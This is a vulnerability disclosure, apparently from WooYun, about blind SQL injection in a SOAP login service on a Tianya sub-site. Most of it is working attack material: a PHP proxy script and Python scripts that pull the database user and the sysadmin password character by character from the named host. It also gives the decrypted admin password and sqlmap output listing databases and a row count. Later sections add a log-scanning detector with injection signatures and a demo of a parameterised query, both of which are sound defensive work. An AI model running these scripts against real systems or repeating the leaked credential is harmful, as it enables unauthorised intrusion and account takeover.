
SQL injection vulnerability on a Tianya Community sub-site (script attached)

2016-05-18 05:50

The problem is in http://oa.tianya.cn/services/MobileService?wsdl

Operation: checkUserLogin



Code:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.services.weaver.com.cn" xmlns:urn2="http://workflow.webservices.mobile.weaver">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <urn:checkUserLogin>
      <urn:in0>1</urn:in0>
      <urn:in1>1</urn:in1>
      <urn:in2>1</urn:in2>
    </urn:checkUserLogin>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>







The in0 parameter

When the value is correct the response is 5; when it is wrong it is 4.

Use the following script:



Code:
<?php
$in0 = $_GET['name'];
header("content-type:text/html;charset=utf-8");
try {
    $client = new SoapClient('http://oa.tianya.cn/services/MobileService?wsdl');
    // in0 is passed straight through from the query string; in1 and in2 are fixed
    $result = $client->checkUserLogin(array('in0' => $in0, 'in1' => '123456', 'in2' => 1));
    echo $result->out; // print the result
} catch (SoapFault $e) {
    print_r('Exception:' . $e);
}
?>





Then visit http://*.*.*.*/xx.php?name=sysadmin

and judge from the returned value whether the condition is true.

The Python script is as follows:

Retrieving the user

Code:
#encoding=utf-8
# Python 2 (httplib, print statement)
import httplib

headers = {
    'Content-Type': 'text/html;charset=UTF-8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0',
}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print 'Start to retrieve user:'
user = ''
for i in range(1, 8):            # one character position per outer iteration
    for payload in payloads:
        conn = httplib.HTTPConnection('127.0.0.1', timeout=150)
        conn.request(method='GET',
                     url="/ty.php?name=1'or/**/ascii(substring(user,%s,1))=%s/**/and'a'='a" % (i, ord(payload)),
                     headers=headers)
        resp = conn.getresponse()
        html_doc = resp.read()
        conn.close()
        print '.',
        if html_doc.count('5') > 0:   # the PHP page echoes 5 when the condition is true
            user += payload
            print '\n\n[in progress]', user,
            break
print '\n\n[Done] user is %s' % user





[Screenshot: Snap98.png]





Proof of vulnerability:

Retrieving the sysadmin password

Main code

Code:
# Python 2; httplib and headers are the same as in the user-retrieval script above
import httplib

headers = {
    'Content-Type': 'text/html;charset=UTF-8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0',
}
payloads = '0123456789ABCDEF'   # 32 positions over a hex alphabet

print 'Start to retrieve password:'
password = ''
for i in range(32):
    for j in payloads:
        conn = httplib.HTTPConnection('127.0.0.1', timeout=150)
        conn.request(method='GET',
                     url="/ty.php?name=sysadmin'/**/and/**/substring((select(password)/**/from/**/hrmresourcemanager/**/where/**/loginid='sysadmin')," + str(i + 1) + ",1)='" + j + "'/**/and'1'='1",
                     headers=headers)
        resp = conn.getresponse()
        html_doc = resp.read()
        #print html_doc
        conn.close()
        print '.',
        if html_doc.count('5') > 0:
            password += j
            print '\n\n[in progress]', password,
            break





[Screenshot: Snap97.png]



After decryption the password is Tianya089*

[Screenshot: Snap99.png]







sqlmap results

Code:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=sysadmin' AND 2387=2387 AND 'tJYN'='tJYN

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: name=sysadmin' AND 8324=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'YqQh'='YqQh
---
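The two scripts above and the sqlmap payloads share a handful of recognisable shapes: `/**/` comments in place of whitespace, `ascii(substring(...))` character probes, numeric and string tautologies (`AND 2387=2387`, `and'a'='a`), a subselect against the password column, and the `sysusers AS sys1,...` heavy query that sqlmap uses for time-based blind on SQL Server. A defender reviewing access logs for this service can match on those shapes directly. The following Python 3 script is an added example, not part of the original write-up; the log lines are constructed (the path, parameter name and payload shapes are the ones the write-up shows; the IP addresses and timestamps are invented). It normalises each query-string value the way the injected SQL is evaded (URL decoding, comment stripping, case folding), tags it with the signatures it matches, and then counts flagged requests per source address, since a blind extraction such as the one above produces hundreds of near-identical requests from one client.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the target in the write-up).
# The query strings reproduce the payload shapes shown above: the /**/-separated
# ascii(substring(...)) probe, sqlmap's numeric and string tautologies, the
# sysusers "heavy query", and the subselect that reads the password column.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/May/2016:05:50:01 +0800] "GET /ty.php?name=sysadmin HTTP/1.1" 200 12',
    '10.0.0.5 - - [18/May/2016:05:50:02 +0800] "GET /ty.php?name=1%27or/**/ascii(substring(user,1,1))=115/**/and%27a%27=%27a HTTP/1.1" 200 12',
    '10.0.0.5 - - [18/May/2016:05:50:03 +0800] "GET /ty.php?name=sysadmin%27%20AND%202387%3D2387%20AND%20%27tJYN%27%3D%27tJYN HTTP/1.1" 200 12',
    '10.0.0.5 - - [18/May/2016:05:50:04 +0800] "GET /ty.php?name=sysadmin%27%20AND%208324%3D(SELECT%20COUNT(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2)%20AND%20%27YqQh%27%3D%27YqQh HTTP/1.1" 200 12',
    '10.0.0.5 - - [18/May/2016:05:50:05 +0800] "GET /ty.php?name=sysadmin%27/**/and/**/substring((select(password)/**/from/**/hrmresourcemanager/**/where/**/loginid=%27sysadmin%27),1,1)=%270%27/**/and%271%27=%271 HTTP/1.1" 200 12',
    '10.0.0.6 - - [18/May/2016:05:51:00 +0800] "GET /ty.php?name=o%27brien HTTP/1.1" 200 12',
]

# Pulls the request target out of a Common Log Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures are matched against the normalised parameter value, so they can
# be written in lower case with single spaces.
SIGNATURES = [
    ("char-extract",  re.compile(r"\bascii\s*\(\s*substring\s*\(")),
    ("num-tautology", re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1(?!\d)")),
    ("str-tautology", re.compile(r"\b(?:and|or)\s*'([^']*)'\s*=\s*'\1(?!\w)")),
    ("mssql-heavy",   re.compile(r"\bfrom\s+sysusers\s+as\s+\w+\s*,")),
    ("subselect",     re.compile(r"\(\s*select\b.*\bfrom\b")),
    ("substring-cmp", re.compile(r"\bsubstring\s*\(.*\)\s*=\s*'")),
]


def normalize(value):
    """Undo the evasions used in the write-up: a second layer of URL encoding,
    /**/ comments standing in for spaces, and mixed case."""
    value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.lower()


def classify(value):
    """Names of every signature the (raw) parameter value matches."""
    norm = normalize(value)
    return [name for name, rx in SIGNATURES if rx.search(norm)]


def scan_log(lines):
    """One finding per (request, parameter) pair that matches at least one signature."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        # parse_qsl splits on the first '=' of each pair, so '=' inside a
        # payload stays part of the value; it also applies one URL decoding.
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            tags = classify(value)
            if tags:
                findings.append({
                    "line": number,
                    "ip": line.split(" ", 1)[0],
                    "path": url.path,
                    "param": param,
                    "tags": tags,
                })
    return findings


def suspicious_sources(findings, threshold):
    """Source addresses with at least `threshold` flagged requests: blind
    extraction is a loop, so the volume from one client is itself a signal."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: c for ip, c in counts.items() if c >= threshold}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print("line %(line)d %(ip)s %(path)s?%(param)s %(tags)s" % h)
    print("sources over threshold:", suspicious_sources(hits, 3))
```

The `o'brien` line shows why the signatures key on operators and comparisons rather than on a lone apostrophe: a quote by itself is legitimate input, a quote followed by `and '1'='1` is not. The numeric and string tautology patterns are anchored on the operator and a back-reference, so `AND 2387=2387` matches while `AND 8324=(SELECT ...)` is caught by the subselect and heavy-query rules instead.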



Code:
available databases [8]:
[*] ecology
[*] ecology_test
[*] lumigens
[*] master
[*] model
[*] msdb
[*] tempdb
[*] update_log

Code:
select count(*) from HrmResource;:    '1557'



Fix recommendations:
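The write-up gives no fix text. The root cause it demonstrates is that the `in0` value reaches the SQL statement as text, so a quote in it ends the string literal and the remainder is parsed as SQL; the 5/4 return value then acts as a one-bit oracle for any injected condition. The following Python 3 script is an added example, not the OA system's own code: it models that lookup against an in-memory SQLite table named after the `hrmresourcemanager`/`loginid` names seen in the payload (the schema is assumed), and places the concatenated query next to the parameterised one so the difference in behaviour on an injected condition is visible.

```python
import sqlite3

# The two response values the write-up observed from checkUserLogin.
OK, FAIL = 5, 4


def build_demo_db():
    """In-memory stand-in for the OA database. The table and column names come
    from the payload in the write-up; the schema and row are assumed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hrmresourcemanager (loginid TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO hrmresourcemanager VALUES (?, ?)",
                 ("sysadmin", "<stored credential placeholder>"))
    conn.commit()
    return conn


def check_user_login_vulnerable(conn, loginid):
    # The user-supplied loginid is pasted into the statement text. A quote in
    # it terminates the literal and the rest is executed as SQL, so whatever
    # the injected condition evaluates to decides between the two return
    # codes. That is the oracle the blind-extraction scripts above rely on.
    sql = "SELECT COUNT(*) FROM hrmresourcemanager WHERE loginid = '%s'" % loginid
    return OK if conn.execute(sql).fetchone()[0] > 0 else FAIL


def check_user_login_fixed(conn, loginid):
    # Same query, but loginid travels as a bound parameter. The database
    # receives it as a value, never re-parses it as SQL, so quotes and
    # keywords inside it are simply compared literally against the column.
    sql = "SELECT COUNT(*) FROM hrmresourcemanager WHERE loginid = ?"
    return OK if conn.execute(sql, (loginid,)).fetchone()[0] > 0 else FAIL


if __name__ == "__main__":
    conn = build_demo_db()
    probes = (
        "sysadmin",                        # legitimate value
        "sysadmin' AND 1=1 AND 'a'='a",    # injected condition that is true
        "sysadmin' AND 1=2 AND 'a'='a",    # injected condition that is false
    )
    for probe in probes:
        print("%-32r vulnerable=%d fixed=%d" % (
            probe,
            check_user_login_vulnerable(conn, probe),
            check_user_login_fixed(conn, probe)))
```

With the concatenated query the true and false probes return 5 and 4 respectively, which is the bit the extraction loops read one character at a time; with the bound parameter both return 4, because no account is literally named `sysadmin' AND 1=1 AND 'a'='a`. The same change applies to SQL Server through any driver that supports parameter binding (`?` placeholders with JDBC or pyodbc); escaping quotes by hand is not a substitute, and the web-service layer should additionally validate `in0` against the format a login id can legitimately take.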

Source: www.wooyun.org/bugs/wooyun-2016-0209613

Views: 85311 | Comments: 0 | Tags: injection, vulnerability
